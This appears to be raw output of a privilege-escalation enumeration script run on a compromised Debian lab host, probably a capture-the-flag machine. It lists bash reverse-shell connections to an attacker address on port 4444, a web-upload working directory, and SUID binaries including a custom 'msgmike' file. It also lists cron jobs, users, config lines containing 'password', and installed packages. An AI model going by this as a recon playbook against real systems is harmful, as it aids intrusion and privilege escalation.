tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 192.168.43.4:36632 192.168.43.3:4444 ESTABLISHED -
tcp 0 0 192.168.43.4:55409 192.168.43.3:4445 CLOSE_WAIT -
tcp 0 0 192.168.43.4:52258 192.168.43.3:4446 CLOSE_WAIT -
tcp 0 0 192.168.43.4:55404 192.168.43.3:4445 CLOSE_WAIT -
tcp 0 0 192.168.43.4:52261 192.168.43.3:4446 CLOSE_WAIT -
tcp 0 0 192.168.43.4:36650 192.168.43.3:4444 ESTABLISHED 2849/bash
tcp 0 0 192.168.43.4:36635 192.168.43.3:4444 CLOSE_WAIT 1717/bash
tcp 0 0 192.168.43.4:55406 192.168.43.3:4445 CLOSE_WAIT -
tcp 0 0 192.168.43.4:55407 192.168.43.3:4445 CLOSE_WAIT -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::50425 :::* LISTEN -
tcp6 0 0 192.168.43.4:80 192.168.43.3:39473 ESTABLISHED -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:941 0.0.0.0:* -
udp 0 0 0.0.0.0:10930 0.0.0.0:* -
udp 0 0 0.0.0.0:43447 0.0.0.0:* -
udp 0 0 127.0.0.1:968 0.0.0.0:* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::20347 :::* -
udp6 0 0 :::39820 :::* -
udp6 0 0 :::941 :::* -
[+] Route
[*] GETTING FILESYSTEM INFO...
[+] Mount results
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=62179,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102412k,mode=755)
/dev/sda1 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=23,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
mqueue on /dev/mqueue type mqueue (rw,relatime)
rpc_pipefs on /run/rpc_pipefs type rpc_pipefs (rw,relatime)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
[+] fstab entries
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
#
# / was on /dev/sda1 during installation
UUID=16b0f3af-7854-4ead-8185-6c248062701c / ext4 errors=remount-ro 0 1
# swap was on /dev/sda5 during installation
UUID=59d16917-774d-43d9-9324-829b365bcfbf none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
[+] Scheduled cron jobs
-rw-r--r-- 1 root root 722 Jun 7 2015 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rw-r--r-- 1 root root 661 Jan 15 2016 php5
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.daily:
total 68
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rwxr-xr-x 1 root root 625 Jan 2 2016 apache2
-rwxr-xr-x 1 root root 15000 Sep 18 2015 apt
-rwxr-xr-x 1 root root 314 Nov 8 2014 aptitude
-rwxr-xr-x 1 root root 355 Oct 17 2014 bsdmainutils
-rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 4125 Mar 13 2016 exim4-base
-rwxr-xr-x 1 root root 89 Nov 8 2014 logrotate
-rwxr-xr-x 1 root root 1293 Dec 31 2014 man-db
-rwxr-xr-x 1 root root 435 Jun 13 2013 mlocate
-rwxr-xr-x 1 root root 249 Nov 19 2015 passwd
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rwxr-xr-x 1 root root 771 Dec 31 2014 man-db
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
[+] Writable cron dirs
[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
00:23:22 up 10:17, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
[+] Super Users Found:
root
[+] Environment
MAIL=/var/mail/kane
USER=kane
SHLVL=2
HOME=/home/kane
OLDPWD=/var/www/html
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
LOGNAME=kane
_=/usr/bin/python
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
APACHE_LOCK_DIR=/var/lock/apache2
LANG=en_US.UTF-8
SHELL=/bin/bash
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/upload
[+] Root and current user history (depends on privs)
[+] Sudoers (privileged)
[+] All users
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash
mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
[+] Current User
kane
[+] Current User ID
uid=1003(kane) gid=1003(kane) groups=1003(kane)
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 2 root root 40 Oct 4 11:06 /dev/mqueue
drwxrwxrwt 2 root root 40 Oct 4 14:06 /dev/shm
drwxrwxrwt 7 root root 4096 Oct 5 00:21 /tmp
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.X11-unix
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.XIM-unix
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.Test-unix
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.font-unix
drwxrwxrwt 2 root root 4096 Oct 4 14:06 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Mar 17 2016 /var/tmp
drwx-wx-wt 2 root root 4096 Oct 5 00:16 /var/lib/php5/sessions
drwxrwxrwt 5 root root 100 Oct 4 14:06 /run/lock
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
[+] Checking if root's home folder is accessible
[+] SUID/SGID Files and Directories
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
-rwsr-xr-x 1 root root 38868 Nov 19 2015 /bin/su
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
drwxrwsr-x 2 root mail 4096 Mar 17 2016 /var/mail
drwxrwsr-x 2 root staff 4096 Jan 17 2016 /var/local
drwxr-s--- 2 mysql adm 4096 Mar 17 2016 /var/log/mysql
drwxr-s--- 2 Debian-exim adm 4096 Mar 17 2016 /var/log/exim4
drwxr-sr-x 2 man root 4096 Mar 17 2016 /var/cache/man
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwxr-sr-x 1 root shadow 34424 Jan 9 2016 /sbin/unix_chkpwd
-rwsr-sr-x 1 mike mike 5148 Mar 17 2016 /home/kane/msgmike
drwxr-sr-x 3 root systemd-journal 60 Oct 4 14:06 /run/log/journal
drwxr-s--- 2 root systemd-journal 60 Oct 4 14:06 /run/log/journal/41c5984e6ab94241b1052c2059fb4b2f
-rwsr-xr-x 1 root root 38740 Nov 19 2015 /usr/bin/newgrp
-rwsr-xr-x 1 root root 52344 Nov 19 2015 /usr/bin/chfn
-rwxr-sr-x 1 root ssh 419192 Jan 13 2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 9680 Oct 17 2014 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 13892 Jun 2 2013 /usr/bin/dotlockfile
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwxr-sr-x 1 root mail 17880 Feb 11 2015 /usr/bin/lockfile
-rwxr-sr-x 1 root crontab 38844 Jun 7 2015 /usr/bin/crontab
-rwsr-xr-x 1 root root 53112 Nov 19 2015 /usr/bin/passwd
-rwxr-sr-x 1 root shadow 61232 Nov 19 2015 /usr/bin/chage
-rwxr-sr-x 1 root mlocate 32116 Jun 13 2013 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 21964 Nov 19 2015 /usr/bin/expiry
-rwsr-sr-x 1 root mail 96192 Feb 11 2015 /usr/bin/procmail
-rwxr-sr-x 1 root tty 26240 Mar 29 2015 /usr/bin/wall
-rwxr-sr-x 1 root mail 9772 Dec 4 2014 /usr/bin/mutt_dotlock
-rwsr-xr-x 1 root root 43576 Nov 19 2015 /usr/bin/chsh
-rwsr-xr-x 1 root root 78072 Nov 19 2015 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 5372 Feb 24 2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 9540 Feb 11 2016 /usr/lib/pt_chown
-rwsr-xr-- 1 root messagebus 362672 Aug 2 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 562536 Jan 13 2016 /usr/lib/openssh/ssh-keysign
drwxrwsr-x 10 root staff 4096 Mar 17 2016 /usr/local
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/include
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/games
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/bin
drwxrwsr-x 3 root staff 4096 Mar 17 2016 /usr/local/lib
drwxrwsr-x 4 root staff 4096 Mar 17 2016 /usr/local/lib/python2.7
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/lib/python2.7/dist-packages
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/lib/python2.7/site-packages
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/src
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/sbin
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/etc
drwxrwsr-x 8 root staff 4096 Mar 17 2016 /usr/local/share
drwxrwsr-x 3 root staff 4096 Mar 17 2016 /usr/local/share/emacs
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/emacs/site-lisp
drwxrwsr-x 6 root staff 4096 Mar 17 2016 /usr/local/share/xml
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/xml/schema
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/xml/entities
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/xml/declaration
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/xml/misc
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/fonts
drwxrwsr-x 7 root staff 4096 Mar 17 2016 /usr/local/share/sgml
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/entities
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/dtd
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/declaration
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/stylesheet
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/misc
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/ca-certificates
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/man
-rwsr-xr-x 1 root root 1085236 Mar 13 2016 /usr/sbin/exim4
[+] Logs containing keyword 'password'
[+] Config files containing keyword 'password'
/etc/mysql/my.cnf:# It has been reported that passwords should be enclosed with ticks/quotes
/etc/exim4/exim4.conf.template:# Authenticators which rely on unencrypted clear text passwords don't
/etc/exim4/exim4.conf.template:# advertise unencrypted clear text password based authenticators on all
/etc/exim4/exim4.conf.template:# preferred over allowing clear text password based authenticators on
/etc/exim4/exim4.conf.template:# use), an authentication ID, and a password. The latter two appear as
/etc/exim4/exim4.conf.template:# valid username and password. In a real configuration you would typically
/etc/exim4/exim4.conf.template:# password are $auth1 and $auth2. Apart from that you can use the same
/etc/exim4/exim4.conf.template:# Authenticate against local passwords using sasl2-bin
/etc/exim4/exim4.conf.template:# # don't send system passwords over unencrypted connections
/etc/exim4/exim4.conf.template:# They get the passwords from CONFDIR/passwd.client, whose format is
/etc/exim4/exim4.conf.template:# Because AUTH PLAIN and AUTH LOGIN send the password in clear, we
/etc/exim4/exim4.conf.template:# clear text password authentication on all connections.
/etc/apache2/sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
/etc/reportbug.conf:# Username and password for SMTP
/etc/ssl/openssl.cnf:# input_password = secret
/etc/ssl/openssl.cnf:# output_password = secret
/etc/ssl/openssl.cnf:challengePassword = A challenge password
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
[+] Shadow File (Privileged)
[*] ENUMERATING PROCESSES AND APPLICATIONS...
[+] Installed Packages
Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
Err?=(none)/Reinst-required (Status,Err:
Name Version Description
acl 2.2.52-2 Access control list utilities
acpi 1.7-1 displays information on ACPI devices
acpi-support-base 0.142-6 scripts for handling base ACPI events such as the power button
acpid 1:2.0.23-2 Advanced Configuration and Power Interface event daemon
adduser 3.113+nmu3 add and remove users and groups
apache2 2.4.10-10+deb8u4 Apache HTTP Server
apache2-bin 2.4.10-10+deb8u4 Apache HTTP Server (modules and other binary files)
apache2-data 2.4.10-10+deb8u4 Apache HTTP Server (common files)
apache2-utils 2.4.10-10+deb8u4 Apache HTTP Server (utility programs for web servers)
apt 1.0.9.8.2 commandline package manager
apt-listchanges 2.85.13+nmu1 package change history notification tool
apt-utils 1.0.9.8.2 package management related utility programs
aptitude 0.6.11-1+b1 terminal-based package manager
aptitude-common 0.6.11-1 architecture independent files for the aptitude package manager
aptitude-doc-en 0.6.11-1 English manual for aptitude, a terminal-based package manager
at 3.1.16-1 Delayed job execution and batch processing
base-files 8+deb8u3 Debian base system miscellaneous files
base-passwd 3.5.37 Debian base system master password and group files
bash 4.3-11+b1 GNU Bourne Again SHell
bash-completion 1:2.1-4 programmable completion for the bash shell
bc 1.06.95-9 GNU bc arbitrary precision calculator language
bind9-host 1:9.9.5.dfsg-9+deb8u6 Version of 'host' bundled with BIND 9.X
binutils 2.25-5 GNU assembler, linker and binary utilities
bsd-mailx 8.1.2-0.20141216cvs-2 simple mail user agent
bsdmainutils 9.0.6 collection of more utilities from FreeBSD
bsdutils 1:2.25.2-6 basic utilities from 4.4BSD-Lite
busybox 1:1.22.0-9+deb8u1 Tiny utilities for small and embedded systems
bzip2 1.0.6-7+b3 high-quality block-sorting file compressor - utilities
ca-certificates 20141019+deb8u1 Common CA certificates
console-setup 1.123 console font and keymap setup program
console-setup-linux 1.123 Linux specific part of console-setup
coreutils 8.23-4 GNU core utilities
cpio 2.11+dfsg-4.1+deb8u1 GNU cpio -- a program to manage archives of files
cpp 4:4.9.2-2 GNU C preprocessor (cpp)
cpp-4.9 4.9.2-10 GNU C preprocessor
cron 3.0pl1-127+deb8u1 process scheduling daemon
dash 0.5.7-4+b1 POSIX-compliant shell
dbus 1.8.20-0+deb8u1 simple interprocess messaging system (daemon and utilities)
dc 1.06.95-9 GNU dc arbitrary precision reverse-polish calculator
debconf 1.5.56 Debian configuration management system
debconf-i18n 1.5.56 full internationalization support for debconf
debian-archive-keyring 2014.3 GnuPG archive keys of the Debian archive
debian-faq 5.0.3 Debian Frequently Asked Questions
debianutils 4.4+b1 Miscellaneous utilities specific to Debian
dictionaries-common 1.23.17 spelling dictionaries - common utilities
diffutils 1:3.3-1+b1 File comparison utilities
discover 2.1.2-7 hardware identification system
discover-data 2.2013.01.11 Data lists for Discover hardware detection system
dmidecode 2.12-3 SMBIOS/DMI table decoder
dmsetup 2:1.02.90-2.2 Linux Kernel Device Mapper userspace library
dnsutils 1:9.9.5.dfsg-9+deb8u6 Clients provided with BIND
doc-debian 6.2 Debian Project documentation and other documents
docutils-common 0.12+dfsg-1 text processing system for reStructuredText - common data
docutils-doc 0.12+dfsg-1 text processing system for reStructuredText - documentation
dpkg 1.17.26 Debian package management system
e2fslibs:i386 1.42.12-1.1 ext2/ext3/ext4 file system libraries
e2fsprogs 1.42.12-1.1 ext2/ext3/ext4 file system utilities
eject 2.1.5+deb1+cvs20081104-13.1 ejects CDs and operates CD-Changers under Linux
emacsen-common 2.0.8 Common facilities for all emacsen
exim4 4.84.2-1 metapackage to ease Exim MTA (v4) installation
exim4-base 4.84.2-1 support files for all Exim MTA (v4) packages
exim4-config 4.84.2-1 configuration for the Exim MTA (v4)
exim4-daemon-light 4.84.2-1 lightweight Exim MTA (v4) daemon
file 1:5.22+15-2+deb8u1 Determines file type using "magic" numbers
findutils 4.4.2-9+b1 utilities for finding files--find, xargs
fontconfig 2.11.0-6.3 generic font configuration library - support binaries
fontconfig-config 2.11.0-6.3 generic font configuration library - configuration
fonts-dejavu-core 2.34-1 Vera font family derivate with additional characters
ftp 0.17-31 classical file transfer client
gcc 4:4.9.2-2 GNU C compiler
gcc-4.8-base:i386 4.8.4-1 GCC, the GNU Compiler Collection (base package)
gcc-4.9 4.9.2-10 GNU C compiler
gcc-4.9-base:i386 4.9.2-10 GCC, the GNU Compiler Collection (base package)
geoip-database 20150317-1 IP lookup command line tools that use the GeoIP library (country database)
gettext-base 0.19.3-2 GNU Internationalization utilities for the base system
gnupg 1.4.18-7 GNU privacy guard - a free PGP replacement
gnupg-agent 2.0.26-6 GNU privacy guard - password agent
gnupg2 2.0.26-6 GNU privacy guard - a free PGP replacement (new v2.x)
gpgv 1.4.18-7 GNU privacy guard - signature verification tool
grep 2.20-4.1 GNU grep, egrep and fgrep
groff-base 1.22.2-8 GNU troff text-formatting system (base system components)
grub-common 2.02~beta2-22+deb8u1 GRand Unified Bootloader (common files)
grub-pc 2.02~beta2-22+deb8u1 GRand Unified Bootloader, version 2 (PC/BIOS version)
grub-pc-bin 2.02~beta2-22+deb8u1 GRand Unified Bootloader, version 2 (PC/BIOS binaries)
grub2-common 2.02~beta2-22+deb8u1 GRand Unified Bootloader (common files for version 2)
gzip 1.6-4 GNU compression utilities
hicolor-icon-theme 0.13-1 default fallback theme for FreeDesktop.org icon themes
host 1:9.9.5.dfsg-9+deb8u6 Transitional package
hostname 3.15 utility to set/show the host name or domain name
iamerican 3.3.02-6 American English dictionary for ispell (standard version)
ibritish 3.3.02-6 British English dictionary for ispell (standard version)
ienglish-common 3.3.02-6 Common files for British and American ispell dictionaries
ifupdown 0.7.53.1 high level tools to configure network interfaces
info 5.2.0.dfsg.1-6 Standalone GNU Info documentation browser
init 1.22 System-V-like init utilities - metapackage
init-system-helpers 1.22 helper tools for all init systems
initramfs-tools 0.120 generic modular initramfs generator
initscripts 2.88dsf-59 scripts for initializing and shutting down the system
insserv 1.14.0-5 boot sequence organizer using LSB init.d script dependency information
install-info 5.2.0.dfsg.1-6 Manage installed documentation in info format
installation-report 2.58 system installation report
iproute2 3.16.0-2 networking and traffic control tools
iptables 1.4.21-2+b1 administration tools for packet filtering and NAT
iputils-ping 3:20121221-5+b2 Tools to test the reachability of network hosts
isc-dhcp-client 4.3.1-6+deb8u2 DHCP client for automatically obtaining an IP address
isc-dhcp-common 4.3.1-6+deb8u2 common files used by all of the isc-dhcp packages
iso-codes 3.57-1 ISO language, territory, currency, script codes and their translations
ispell 3.3.02-6 International Ispell (an interactive spelling corrector)
kbd 1.15.5-2 Linux console font and keytable utilities
keyboard-configuration 1.123 system-wide keyboard preferences
klibc-utils 2.0.4-2 small utilities built with klibc for early boot
kmod 18-3 tools for managing Linux kernel modules
krb5-locales 1.12.1+dfsg-19+deb8u2 Internationalization support for MIT Kerberos
laptop-detect 0.13.7 attempt to detect a laptop
less 458-3 pager program similar to more
libacl1:i386 2.2.52-2 Access control list shared library
libaio1:i386 0.3.110-1 Linux kernel AIO access library - shared library
libalgorithm-c3-perl 0.09-1 Perl module for merging hierarchies using the C3 algorithm
libapache2-mod-php5 5.6.17+dfsg-0+deb8u1 server-side, HTML-embedded scripting language (Apache 2 module)
libapr1:i386 1.5.1-3 Apache Portable Runtime Library
libaprutil1:i386 1.5.4-1 Apache Portable Runtime Utility Library
libaprutil1-dbd-sqlite3:i386 1.5.4-1 Apache Portable Runtime Utility Library - SQLite3 Driver
libaprutil1-ldap:i386 1.5.4-1 Apache Portable Runtime Utility Library - LDAP Driver
libapt-inst1.5:i386 1.0.9.8.2 deb package format runtime library
libapt-pkg4.12:i386 1.0.9.8.2 package management runtime library
libarchive-extract-perl 0.72-1 generic archive extracting module
libasan1:i386 4.9.2-10 AddressSanitizer -- a fast memory error detector
libasprintf0c2:i386 0.19.3-2 GNU library to use fprintf and friends in C++
libassuan0:i386 2.1.2-2 IPC library for the GnuPG components
libatk1.0-0:i386 2.14.0-1 ATK accessibility toolkit
libatk1.0-data 2.14.0-1 Common files for the ATK accessibility toolkit
libatomic1:i386 4.9.2-10 support library providing __atomic built-in functions
libattr1:i386 1:2.4.47-2 Extended attribute shared library
libaudit-common 1:2.4-1 Dynamic library for security auditing - common files
libaudit1:i386 1:2.4-1+b1 Dynamic library for security auditing
libauthen-sasl-perl 2.1600-1 Authen::SASL - SASL Authentication framework
libavahi-client3:i386 0.6.31-5 Avahi client library
libavahi-common-data:i386 0.6.31-5 Avahi common data files
libavahi-common3:i386 0.6.31-5 Avahi common library
libbind9-90 1:9.9.5.dfsg-9+deb8u6 BIND9 Shared Library used by BIND
libblkid1:i386 2.25.2-6 block device id library
libboost-iostreams1.55.0:i386 1.55.0+dfsg-3 Boost.Iostreams Library
libbsd0:i386 0.7.0-2 utility functions from BSD systems - shared library
libbz2-1.0:i386 1.0.6-7+b3 high-quality block-sorting file compressor library - runtime
libc-bin 2.19-18+deb8u3 GNU C Library: Binaries
libc-dev-bin 2.19-18+deb8u3 GNU C Library: Development binaries
libc6:i386 2.19-18+deb8u3 GNU C Library: Shared libraries
libc6-dev:i386 2.19-18+deb8u3 GNU C Library: Development Libraries and Header Files
libc6-i686:i386 2.19-18+deb8u3 GNU C Library: Shared libraries [i686 optimized]
libcairo2:i386 1.14.0-2.1 Cairo 2D vector graphics library
libcap-ng0:i386 0.7.4-2 An alternate POSIX capabilities library
libcap2:i386 1:2.24-8 POSIX 1003.1e capabilities (library)
libcap2-bin 1:2.24-8 POSIX 1003.1e capabilities (utilities)
libcgi-fast-perl 1:2.04-1 CGI subclass for work with FCGI
libcgi-pm-perl 4.09-1 module for Common Gateway Interface applications
libcilkrts5:i386 4.9.2-10 Intel Cilk Plus language extensions (runtime)
libclass-accessor-perl 0.34-1 Perl module that automatically generates accessors
libclass-c3-perl 0.26-1 pragma for using the C3 method resolution order
libclass-c3-xs-perl 0.13-2+b1 Perl module to accelerate Class::C3
libclass-isa-perl 0.36-5 report the search path for a class's ISA tree
libcloog-isl4:i386 0.18.2-1+b2 Chunky Loop Generator (runtime library)
libcomerr2:i386 1.42.12-1.1 common error description library
libcpan-meta-perl 2.142690-1 Perl module to access CPAN distributions metadata
libcryptsetup4:i386 2:1.6.6-5 disk encryption support - shared library
libcups2:i386 1.7.5-11+deb8u1 Common UNIX Printing System(tm) - Core library
libcurl3-gnutls:i386 7.38.0-4+deb8u3 easy-to-use client-side URL transfer library (GnuTLS flavour)
libcwidget3:i386 0.5.17-2 high-level terminal interface library for C++ (runtime files)
libdata-optlist-perl 0.109-1 module to parse and validate simple name/value option pairs
libdata-section-perl 0.200006-1 module to read chunks of data from a module's DATA section
libdatrie1:i386 0.2.8-1 Double-array trie library
libdb5.3:i386 5.3.28-9 Berkeley v5.3 Database Libraries [runtime]
libdbd-mysql-perl 4.028-2+b1 Perl5 database interface to the MySQL database
libdbi-perl 1.631-3+b1 Perl Database Interface (DBI)
libdbus-1-3:i386 1.8.20-0+deb8u1 simple interprocess messaging system (library)
libdebconfclient0:i386 0.192 Debian Configuration Management System (C-implementation library)
libdevmapper1.02.1:i386 2:1.02.90-2.2 Linux Kernel Device Mapper userspace library
libdiscover2 2.1.2-7 hardware identification library
libdns-export100 1:9.9.5.dfsg-9+deb8u6 Exported DNS Shared Library
libdns100 1:9.9.5.dfsg-9+deb8u6 DNS Shared Library used by BIND
libedit2:i386 3.1-20140620-2 BSD editline and history libraries
libencode-locale-perl 1.03-1 utility to determine the locale encoding
libestr0 0.1.9-1.1 Helper functions for handling strings (lib)
libevent-2.0-5:i386 2.0.21-stable-2 Asynchronous event notification library
libexpat1:i386 2.1.0-6+deb8u1 XML parsing C library - runtime library
libfcgi-perl 0.77-1+b1 helper module for FastCGI
libffi6:i386 3.1-2+b2 Foreign Function Interface library runtime
libfile-listing-perl 6.04-1 module to parse directory listings
libfont-afm-perl 1.20-1 Font::AFM - Interface to Adobe Font Metrics files
libfontconfig1:i386 2.11.0-6.3 generic font configuration library - runtime
libfreetype6:i386 2.5.2-3+deb8u1 FreeType 2 font engine, shared library files
libfuse2:i386 2.9.3-15+deb8u2 Filesystem in Userspace (library)
libgc1c2:i386 1:7.2d-6.4 conservative garbage collector for C and C++
libgcc-4.9-dev:i386 4.9.2-10 GCC support library (development files)
